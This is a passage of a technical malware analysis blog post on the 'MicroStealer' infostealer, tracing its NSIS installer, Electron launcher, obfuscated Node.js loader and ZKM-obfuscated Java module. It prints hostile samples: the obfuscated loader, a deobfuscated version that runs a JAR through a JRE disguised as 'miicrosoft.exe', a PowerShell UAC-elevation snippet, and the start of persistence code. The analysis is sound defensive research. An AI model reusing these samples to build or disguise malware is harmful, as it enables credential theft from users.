class=\"wp-element-caption\"><em>Analysis&nbsp;of&nbsp;the&nbsp;NSIS&nbsp;Installer&nbsp;contents&nbsp;<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Among the files, the next stage in the infection chain can already be identified: Game Launcher.exe. The analysis then moves on to the other directories within the archive.<\/p>\n\n\n\n<p>Inside the resource directory, two ASAR archives<strong> <\/strong>(Atom Shell Archive) can be found: <strong>app.asar<\/strong> and <strong>app.asar.unpacked<\/strong>. The latter contains the **main stealer module, an executable JAR file, along with a Java Runtime Environment (JRE), packaged inside the archive module.zip.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"82\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4.jpg\" alt=\"Analysis\u00a0of\u00a0the\u00a0ASAR\u00a0ArchiveContents\u00a0\" class=\"wp-image-19087\" style=\"width:636px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4.jpg 960w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-300x26.jpg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-768x66.jpg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-370x32.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-270x23.jpg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-740x63.jpg 740w\" sizes=\"(max-width: 960px) 100vw, 960px\" \/><\/figure><\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"961\" height=\"64\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5.jpg\" alt=\"Analysis\u00a0of\u00a0the\u00a0ASAR\u00a0ArchiveContents\u00a0\" class=\"wp-image-19088\" style=\"width:650px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5.jpg 961w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-300x20.jpg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-768x51.jpg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-370x25.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-270x18.jpg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-740x49.jpg 740w\" sizes=\"(max-width: 961px) 100vw, 961px\" \/><figcaption class=\"wp-element-caption\"><em>Analysis&nbsp;of&nbsp;the&nbsp;ASAR&nbsp;archive contents&nbsp;<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>After unpacking app.asar using a standard ASAR unpacker, a small Node.js<strong> component <\/strong>becomes visible.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"614\" height=\"115\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6.jpg\" alt=\"Analysis\u00a0and\u00a0Unpacking\u00a0of\u00a0app.asar\u00a0\" class=\"wp-image-19089\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6.jpg 614w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-300x56.jpg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-370x69.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-270x51.jpg 270w\" sizes=\"(max-width: 614px) 100vw, 614px\" \/><figcaption class=\"wp-element-caption\"><em>Analysis&nbsp;and&nbsp;unpacking&nbsp;of&nbsp;app.asar&nbsp;<\/em><\/figcaption><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">Static&nbsp;Analysis&nbsp;of&nbsp;the&nbsp;Node.js&nbsp;Component&nbsp;<\/h2>\n\n\n\n<p>At this stage, the focus shifts to the main script located in <strong>index.js<\/strong>. Opening it in a text editor immediately reveals multiple signs of obfuscation, including compressed strings, constants grouped into arrays, flattened control flow, and dead code.<\/p>\n\n\n\n<p>The next step is to analyze the string handling logic, since strings are used extensively throughout the program and can help reconstruct the malware\u2019s execution flow.<\/p>\n\n\n\n<p>To understand how the malware retrieves the strings it needs, let us examine the following code block:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\"><strong>var<\/strong>&nbsp;wa4Ibtk;&nbsp;\n(<strong>function<\/strong>&nbsp;() {&nbsp;\n<strong>function<\/strong>*&nbsp;mjAYxpv(mjAYxpv,&nbsp;JbBfOsP,&nbsp;PXuU6i,&nbsp;Tky9na&nbsp;=&nbsp;{&nbsp;\nrwLytg:&nbsp;{}&nbsp;\n}) {&nbsp;\n<strong>while<\/strong>&nbsp;(mjAYxpv&nbsp;+&nbsp;JbBfOsP&nbsp;+&nbsp;PXuU6i&nbsp;!==&nbsp;124)&nbsp;<strong>with<\/strong>(Tky9na.bWzSK3&nbsp;||&nbsp;Tky9na)&nbsp;<strong>switch<\/strong>&nbsp;(mjAYxpv&nbsp;+&nbsp;JbBfOsP&nbsp;+&nbsp;PXuU6i) {&nbsp;\n<strong>default<\/strong>:&nbsp;\n&#091;Tky9na.rwLytg.sZF0hF,&nbsp;Tky9na.rwLytg.MtsKAJ,&nbsp;Tky9na.rwLytg.AggjBE]&nbsp;=&nbsp;&#091;-57,&nbsp;-181,&nbsp;104];&nbsp;\nTky9na.bWzSK3&nbsp;=&nbsp;Tky9na.TDHlw5,&nbsp;mjAYxpv&nbsp;+=&nbsp;-134,&nbsp;JbBfOsP&nbsp;+=&nbsp;290,&nbsp;PXuU6i&nbsp;+=&nbsp;145;&nbsp;\n<strong>break<\/strong>;&nbsp;\n<strong>case<\/strong>&nbsp;162:&nbsp;\n<strong>case<\/strong>&nbsp;PXuU6i&nbsp;-&nbsp;-62:&nbsp;\nTky9na.bWzSK3&nbsp;=&nbsp;Tky9na.Q6N0rF,&nbsp;mjAYxpv&nbsp;+=&nbsp;-340,&nbsp;JbBfOsP&nbsp;+=&nbsp;290;&nbsp;\n<strong>break<\/strong>;&nbsp;\n<strong>case<\/strong>&nbsp;Tky9na.rwLytg.AggjBE&nbsp;+&nbsp;-186:&nbsp;\nTky9na.bWzSK3&nbsp;=&nbsp;Tky9na.IQz1SBX,&nbsp;mjAYxpv&nbsp;+=&nbsp;-211,&nbsp;JbBfOsP&nbsp;+=&nbsp;290;&nbsp;\n<strong>break<\/strong>;&nbsp;\n<strong>case<\/strong>&nbsp;-216:&nbsp;\n<strong>case<\/strong>&nbsp;9:&nbsp;\n<strong>case<\/strong>&nbsp;-78:&nbsp;\n<strong>case<\/strong>&nbsp;60:&nbsp;\n<strong>case<\/strong>&nbsp;PXuU6i&nbsp;-&nbsp;190:&nbsp;\n<strong>case<\/strong>&nbsp;-96:&nbsp;\n&#091;Tky9na.rwLytg.sZF0hF,&nbsp;Tky9na.rwLytg.MtsKAJ,&nbsp;Tky9na.rwLytg.AggjBE]&nbsp;=&nbsp;&#091;-62,&nbsp;172,&nbsp;231];&nbsp;\nrwLytg.DDXChP&nbsp;=&nbsp;\"\u0261\u2c43\u00bc\u01c0\u2f21\u782b\u206e\\\\\u01b0\u0de0\u7958\u0d00\u03a0\u4321\u6e21\u6d00\u0a82\u42a1\u4690\u0270\u0b0a\u2025&lt;\u4700\u0f80\u1569\u00f6&nbsp;(...truncated)\";&nbsp;\nrwLytg.tuWPH66&nbsp;=&nbsp;cIb9x8P.decompressFromUTF16(rwLytg.DDXChP);&nbsp;\nTky9na.bWzSK3&nbsp;=&nbsp;Tky9na.rwLytg,&nbsp;mjAYxpv&nbsp;+=&nbsp;-83,&nbsp;JbBfOsP&nbsp;+=&nbsp;227,&nbsp;PXuU6i&nbsp;+=&nbsp;-441;&nbsp;\n<strong>break<\/strong>;&nbsp;\n<strong>case<\/strong>&nbsp;40:&nbsp;\n<strong>case<\/strong>&nbsp;235:&nbsp;\n<strong>case<\/strong>&nbsp;mjAYxpv&nbsp;-&nbsp;-42:&nbsp;\nTky9na.rwLytg.zxxO0HE&nbsp;=&nbsp;tuWPH66.split(\"|\");&nbsp;\n<strong>return<\/strong>&nbsp;oh5cES&nbsp;=&nbsp;!0,&nbsp;wa4Ibtk&nbsp;=&nbsp;<strong>function<\/strong>&nbsp;(mjAYxpv) {&nbsp;\n<strong>return<\/strong>&nbsp;zxxO0HE&#091;mjAYxpv]&nbsp;\n}&nbsp;\n}&nbsp;\n}&nbsp;\n<strong>var<\/strong>&nbsp;oh5cES,&nbsp;JbBfOsP&nbsp;=&nbsp;mjAYxpv(-31,&nbsp;-159,&nbsp;415).next().value;&nbsp;\n<strong>if<\/strong>&nbsp;(oh5cES) {&nbsp;\n<strong>return<\/strong>&nbsp;JbBfOsP&nbsp;\n}&nbsp;\n})();&nbsp;<\/code><\/pre>\n\n\n\n<p>As we can see, all strings are combined and compressed using the <strong>LZ-String<\/strong> library into a single sequence of Unicode characters, stored in the variable <strong>DDXChP<\/strong> (for example, \u201c\u0261\u2c43\u00bc\u01c0\u2f21\u782b\u206e\\\u01b0\u0de0\u7958\u0d00\u03a0\u4321\u6e21\u6d00\u2026\u201d).<\/p>\n\n\n\n<p>To&nbsp;restore&nbsp;them,&nbsp;the&nbsp;malware&nbsp;uses&nbsp;the&nbsp;<strong>decompressFromUTF16<\/strong>&nbsp;method: rwLytg.tuWPH66 = cIb9x8P.decompressFromUTF16(rwLytg.DDXChP);&nbsp;<\/p>\n\n\n\n<p>This means that the value stored in DDXChP is the result of <strong>UTF-16-based compression<\/strong>. The obfuscator may reference the library under a different name, such as cIb9x8P, but the logic remains the same: the original string data is reconstructed from the compressed sequence.<\/p>\n\n\n\n<p>After&nbsp;decompression,&nbsp;the&nbsp;resulting&nbsp;string&nbsp;is&nbsp;split&nbsp;using&nbsp;the&nbsp;<strong>|&nbsp;delimiter<\/strong>: Tky9na.rwLytg.zxxO0HE = tuWPH66.split(&#8220;|&#8221;);&nbsp;<\/p>\n\n\n\n<p>A&nbsp;specific&nbsp;string&nbsp;is&nbsp;then&nbsp;retrieved&nbsp;by&nbsp;index&nbsp;through&nbsp;a&nbsp;<strong>getter&nbsp;function<\/strong>:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>wa4Ibtk =&nbsp;function&nbsp;(mjAYxpv) {&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;zxxO0HE&#091;mjAYxpv];&nbsp;\n};&nbsp;<\/code><\/pre>\n\n\n\n<p>Later, the malware references these strings through calls such as <strong>wa4Ibtk(3)<\/strong>, <strong>wa4Ibtk(7)<\/strong>, and <strong>wa4Ibtk(11)<\/strong>, where the argument represents an index in the <strong>zxxO0HE<\/strong> array.<\/p>\n\n\n\n<p>After removing the unnecessary junk code, this logic can be represented in the following simplified form:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>var<\/strong>&nbsp;GetString;&nbsp;\n(<strong>function<\/strong>&nbsp;InitializeStringTable() {&nbsp;\n<strong>var<\/strong>&nbsp;compressed&nbsp;=&nbsp;\"\u0261\u2c43\u00bc\u01c0\u2f21\u782b\u206e\\\\\u01b0\u0de0\u7958\u0d00\u03a0\u4321\u6e21\u6d00&nbsp;(...truncated)\";&nbsp;\n<strong>var<\/strong>&nbsp;decompressed&nbsp;=&nbsp;lzObject.decompressFromUTF16(compressed);&nbsp;\n&nbsp;\nstringTable&nbsp;=&nbsp;decompressed.split(\"|\");&nbsp;\nGetString&nbsp;=&nbsp;<strong>function<\/strong>&nbsp;(index) {&nbsp;\n<strong>return<\/strong>&nbsp;stringTable&#091;index];&nbsp;\n};&nbsp;\n})();&nbsp;<\/code><\/pre>\n\n\n\n<p>Next, we copy the <strong>lzObject<\/strong> implementation from the target script and run the resulting function in a separate script. This makes it possible to extract all strings used by the program. Since the total number of recovered strings is quite large, only some of the most interesting examples are shown below, along with their indices.<\/p>\n\n\n\n<p>Note that many strings are truncated and concatenated directly in the code. Their full values are provided in parentheses:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">&#091;2]  spawn \n&#091;3]  exec \n&#091;59] env \n \n&#091;11-25] \n    try { \n        Start-Process -FilePath \" -ArgumentList '--install' -Verb RunAs \n        Stop-Process -Id \n        exit 0 \n    } catch { \n        exit 1 \n    } \n \n&#091;35-41] powershell -ExecutionPolicy Bypass -NoProfile -NonInteractive -File \" \n \n&#091;27]    tmpdir \n&#091;32-34] writeF + ileSyn (writeFileSync) \n&#091;54-55] unlink + Sync (unlinkSync) \n&#091;79]    exists \n&#091;107-108] readFi + leSync (readFileSync) \n \n&#091;60-65] LOCALA + PPDATA \u2192 USERPR + OFILE \u2192 AppDat + a + Local (LOCALAPPDATA \/ USERPROFILE \/ AppData\\Local) \n&#091;66]    soft.j (soft.jar) \n&#091;67]    model \n&#091;68]    jre \n&#091;69]    bin \n&#091;70-71] miicro + soft.e (miicrosoft.exe) \n&#091;73-74] resour + cesPat (resourcesPath) \n&#091;76-78] app.as + ar.unp + acked (app.asar.unpacked) \n&#091;81-82] model. + zip (model.zip) \n \n&#091;128]   -jar \n&#091;129-132] detach (detached), stdio, ignore, unref \n&#091;140-141] --inst + all (--install) <\/code><\/pre>\n\n\n\n<p>Let us now examine the obfuscated code fragments that implement the logic for launching the&nbsp;<strong>main payload<\/strong>, which is distributed in&nbsp;<strong>JAR format:<\/strong>&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">&nbsp;&nbsp;&nbsp;&nbsp;<strong>const<\/strong>&nbsp;mjAYxpv&nbsp;=&nbsp;&#091;0,&nbsp;<strong>null<\/strong>,&nbsp;32,&nbsp;2,&nbsp;1,&nbsp;256,&nbsp;6,&nbsp;3,&nbsp;8,&nbsp;16,&nbsp;4,&nbsp;\"undefined\",&nbsp;\"LZString\",&nbsp;\"=\",&nbsp;\" \",&nbsp;\";\",&nbsp;\"\\\\\\\\\",&nbsp;15,&nbsp;30,&nbsp;\"\\\"\",&nbsp;!1,&nbsp;!0,&nbsp;<strong>void<\/strong>&nbsp;0,&nbsp;26,&nbsp;59,&nbsp;10,&nbsp;73,&nbsp;74,&nbsp;\"h\",&nbsp;55,&nbsp;66,\"ar\",&nbsp;79,&nbsp;1023,&nbsp;65536,&nbsp;55296,&nbsp;56320,&nbsp;63,&nbsp;31,&nbsp;12,&nbsp;18,&nbsp;7,&nbsp;128,&nbsp;192,&nbsp;\"e\",&nbsp;91,&nbsp;92,&nbsp;93,&nbsp;255,&nbsp;224,&nbsp;240,&nbsp;97,&nbsp;98,&nbsp;99,&nbsp;100,&nbsp;\"d\",&nbsp;33,&nbsp;\"c\",&nbsp;\")\",&nbsp;106,&nbsp;107,&nbsp;108,&nbsp;\"g\",&nbsp;24,&nbsp;60,&nbsp;1000];&nbsp;\n&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;<em>\/\/ ...<\/em>&nbsp;\n&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;<strong>const<\/strong>&nbsp;Tky9na&nbsp;=&nbsp;require(\"fs\"),&nbsp;\n&nbsp;&nbsp;&nbsp; _LLSkL&nbsp;=&nbsp;require(\"path\"),&nbsp;\n&nbsp;&nbsp;&nbsp; {&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#091;wa4Ibtk(mjAYxpv&#091;3])]:&nbsp;E5NpXn,&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#091;wa4Ibtk(mjAYxpv&#091;7])]:&nbsp;TD4p2BE&nbsp;\n&nbsp;&nbsp;&nbsp; }&nbsp;=&nbsp;require(\"child_process\"),&nbsp;\n&nbsp;&nbsp;&nbsp; peB9yJ&nbsp;=&nbsp;require(\"os\"),&nbsp;\n&nbsp;&nbsp;&nbsp; OnZdH7B&nbsp;=&nbsp;require(\"adm-zip\");&nbsp;\n&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;<em>\/\/ ...<\/em>&nbsp;\n&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;<strong>const<\/strong>&nbsp;JbBfOsP&nbsp;=&nbsp;process&#091;wa4Ibtk(mjAYxpv&#091;24])]&#091;wa4Ibtk(mjAYxpv&#091;64])&nbsp;+&nbsp;wa4Ib(61)]&nbsp;||&nbsp;_LLSkL&#091;wa4Ibtk(mjAYxpv&#091;23])](process&#091;wa4Ibtk(mjAYxpv&#091;24])]&#091;wa4Ibtk(62)&nbsp;+wa4Ibtk(mjAYxpv&#091;37])],&nbsp;wa4Ibtk(64)&nbsp;+&nbsp;\"a\",&nbsp;wa4Ibtk(65)),&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; TD4p2BE&nbsp;=&nbsp;_LLSkL&#091;wa4Ibtk(mjAYxpv&#091;23])](JbBfOsP,&nbsp;wa4Ibtk(mjAYxpv&#091;30])&nbsp;+&nbsp;mjAYxpv&#091;31]),&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; peB9yJ&nbsp;=&nbsp;_LLSkL&#091;wa4Ibtk(mjAYxpv&#091;23])](JbBfOsP,&nbsp;wa4Ibtk(67),&nbsp;wa4Ibtk(68),&nbsp;wa4Ibtk(69),&nbsp;wa4Ibtk(70)&nbsp;+&nbsp;wa4Ibtk(71)&nbsp;+&nbsp;\"xe\");&nbsp;\n&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;<em>\/\/ ...<\/em>&nbsp;\n&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;<strong>const<\/strong>&nbsp;vWOBncd&nbsp;=&nbsp;E5NpXn(peB9yJ,&nbsp;&#091;wa4Ibtk(mjAYxpv&#091;42]),&nbsp;TD4p2BE],&nbsp;{&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#091;wa4Ibtk(129)&nbsp;+&nbsp;\"ed\"]:&nbsp;mjAYxpv&#091;21],&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#091;wa4Ibtk(130)]:&nbsp;wa4Ibtk(131),&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#091;wa4Ibtk(mjAYxpv&#091;24])]:&nbsp;process&#091;wa4Ibtk(mjAYxpv&#091;24])]&nbsp;\n&nbsp;&nbsp;&nbsp; });&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;vWOBncd&#091;wa4Ibtk(132)]();&nbsp;\n&nbsp;&nbsp;&nbsp;&nbsp;process&#091;wa4Ibtk(mjAYxpv&#091;59])](mjAYxpv&#091;0])&nbsp;<\/code><\/pre>\n\n\n\n<p>After&nbsp;removing the junk code and substituting&nbsp;the&nbsp;resolved&nbsp;strings, this logic&nbsp;can&nbsp;be&nbsp;represented&nbsp;in&nbsp;the&nbsp;following&nbsp;much&nbsp;more&nbsp;readable&nbsp;form:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">const fs = require(\"fs\"); \nconst path = require(\"path\"); \nconst { spawn, exec } = require(\"child_process\"); \nconst os = require(\"os\"); \nconst AdmZip = require(\"adm-zip\"); \n \nconst baseDir = \n    process.env.LOCALAPPDATA || \n    path.join(process.env.USERPROFILE, \"AppData\", \"Local\"); \n \nconst jarPath = path.join(baseDir, \"soft.jar\"); \n \nconst javaExePath = path.join( \n    baseDir, \n    \"model\", \n    \"jre\", \n    \"bin\", \n    \"miicrosoft.exe\" \n); \n \nconst child = spawn( \n    javaExePath, \n    &#091;\"-jar\", jarPath], \n    { \n        detached: true, \n        stdio: \"ignore\", \n        env: process.env \n    } \n); \n \nchild.unref(); \n \nprocess.exit(0); <\/code><\/pre>\n\n\n\n<p>The malware then extracts an embedded JRE, disguises the executable as miicrosoft.exe, launches the JAR file in the background, and immediately terminates the main Node.js process, allowing the payload to continue running independently.<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\nConfirm\u00a0real attacker activity faster\n<br>Prevent suspicious files from <span class=\"highlight\">turning into enterprise incidents\u00a0<\/span>   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=microstealer-technical-analysis&#038;utm_term=120326&#038;utm_content=linktoenterprise#contact-sales\" rel=\"noopener\" target=\"_blank\">\nContact us \n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h2 class=\"wp-block-heading\">Breaking Down the Execution Chain&nbsp;<\/h2>\n\n\n\n<p>As part of its execution chain, the malware&nbsp;also attempts to obtain elevated privileges. This stage is not analyzed in detail here, as it&nbsp;relies primarily on social engineering: the victim is simply presented with a UAC prompt that is likely to be perceived as a normal part of the installation process.&nbsp;<\/p>\n\n\n\n<p>The PowerShell script used for this step is shown below:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">try { \n    Start-Process -FilePath \"Game Launcher.exe\" -ArgumentList '--install' -Verb RunAs \n    Stop-Process -Id (pid) \n    exit 0 \n} catch { \n    exit 1 \n} <\/code><\/pre>\n\n\n\n<p>At this stage, the role of <strong>Game Launcher.exe<\/strong> becomes clear. The presence of the <strong>resources<\/strong> directory containing an <strong>ASAR archive<\/strong> and a <strong>Node.js project<\/strong> indicates the use of <strong>Electron<\/strong>. Analysis in <a href=\"https:\/\/github.com\/NationalSecurityAgency\/ghidra\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Ghidra<\/strong><\/a> confirms this: a modal window prompts to load <strong>electron.pdb<\/strong>, and both the strings and the entry point contain characteristic <strong>Electron artifacts<\/strong>.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1002\" height=\"400\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7.jpg\" alt=\"Strings from the Electron framework\" class=\"wp-image-19098\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7.jpg 1002w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-300x120.jpg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-768x307.jpg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-370x148.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-270x108.jpg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-740x295.jpg 740w\" sizes=\"(max-width: 1002px) 100vw, 1002px\" \/><figcaption class=\"wp-element-caption\"><em>Strings from the Electron framework in the disassembler confirm that Electron is used in the binary.<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Ultimately,&nbsp;<strong>Game Launcher.exe<\/strong>&nbsp;is an&nbsp;<strong>Electron application<\/strong>&nbsp;used as part of the malware&nbsp;delivery chain. The execution flow is as follows:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>NSIS (RocobeSetup.exe):&nbsp;<\/strong>An&nbsp;archive installer containing the malicious payload&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Electron (Game Launcher.exe):&nbsp;<\/strong>Requests administrator privileges through UAC&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Electron (Game Launcher.exe \u2013install):&nbsp;<\/strong>Extracts and launches the JAR file&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Java (miicrosoft.exe -jar soft.jar):<\/strong>&nbsp;Executes the main malicious logic&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>The combination&nbsp;of an&nbsp;NSIS installer and Electron&nbsp;significantly complicates the static analysis of the malware. Electron&nbsp;can&nbsp;directly&nbsp;read and execute JavaScript code&nbsp;from an ASAR archive without extracting it to the file system,<strong>&nbsp;bypassing traditional signature-based detection mechanisms<\/strong>.&nbsp;<\/p>\n\n\n\n<p>At the same time, the&nbsp;NSIS installer&nbsp;ensures that the malicious files&nbsp;remain&nbsp;unavailable for analysis or detection until the installer itself finishes execution.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Static Analysis of the Java Module&nbsp;<\/h2>\n\n\n\n<p>The next step is to analyze the main module by loading the <strong>JAR file<\/strong> into a <strong>disassembler<\/strong>. Once again, we encounter <strong>obfuscated code;<\/strong> this time on the <strong>Java<\/strong> side. As with the Node.js component, the strings are <strong>encrypted<\/strong> and recovered through <strong>helper functions<\/strong>. A representative fragment is shown below:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">private static void lambda$checkEnvironment$1(String str) throws Exception { \n    int iD = a.d(); \n    String&#091;] strArr = new String&#091;a(0x5e23, 0x6709cb2b9951dedeL)]; \n    strArr&#091;0] = a((int) 0xfffff707, (int) 0xfffff6e2); \n    strArr&#091;1] = a((int) 0xfffff636, (int) 0xffff90f5); \n    strArr&#091;2] = a((int) 0xfffff6c2, (int) 0xfffff530); \n     \n    \/\/ ... \n \n    ?? AnyMatch = iD; \n    AnyMatch = Arrays.asList(strArr).stream().anyMatch((v1) -> { \n        return lambda$null$0(r1, v1); \n    }); \n} <\/code><\/pre>\n\n\n\n<p>After identifying this characteristic pattern, we examined the header of the .class file to look for traces of the obfuscator in use, and immediately found <strong>ZKM (Zelix KlassMaster) v21.0.0<\/strong>.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"165\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1024x165.jpg\" alt=\"The presence of the ZKM (Zelix KlassMaster) v21.0.0\" class=\"wp-image-19099\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-1024x165.jpg 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-300x48.jpg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-768x124.jpg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-370x60.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-270x44.jpg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8-740x119.jpg 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image8.jpg 1121w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>The presence of the ZKM (Zelix KlassMaster) v21.0.0 obfuscator string in the Java class constant pool confirms its use&nbsp;<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>There are already several effective public deobfuscators available for this version of <strong>ZKM<\/strong>. In this case, <a href=\"https:\/\/github.com\/GraxCode\/threadtear\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Threadtear<\/strong><\/a> was used with a set of ZKM-focused modules, including <strong>string deobfuscation, access restoration, flow deobfuscation<\/strong>, and several additional modules for <strong>bytecode cleanup<\/strong>. After successful deobfuscation, the analysis proceeded to the malware\u2019s core functionality.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Overview of&nbsp;MicroStealer&nbsp;Capabilities&nbsp;<\/h2>\n\n\n\n<p>After deobfuscation, the code became significantly more readable, although not entirely; some parts of the logic still remain convoluted. Even so, the core functionality of MicroStealer is already open to analysis. Let us look at its modules in more detail:<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Persistence&nbsp;<\/h3>\n\n\n\n<p>Persistence is implemented through the&nbsp;<strong>Windows Task Scheduler<\/strong>:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: wrap\">private void a() throws InterruptedException, IOException { \n    String string = System.getenv(\"LOCALAPPDATA\"); \n    string = System.getProperty(\"user.home\") + \"\\\\AppData\\\\Local\"; \n    String string2 = string + 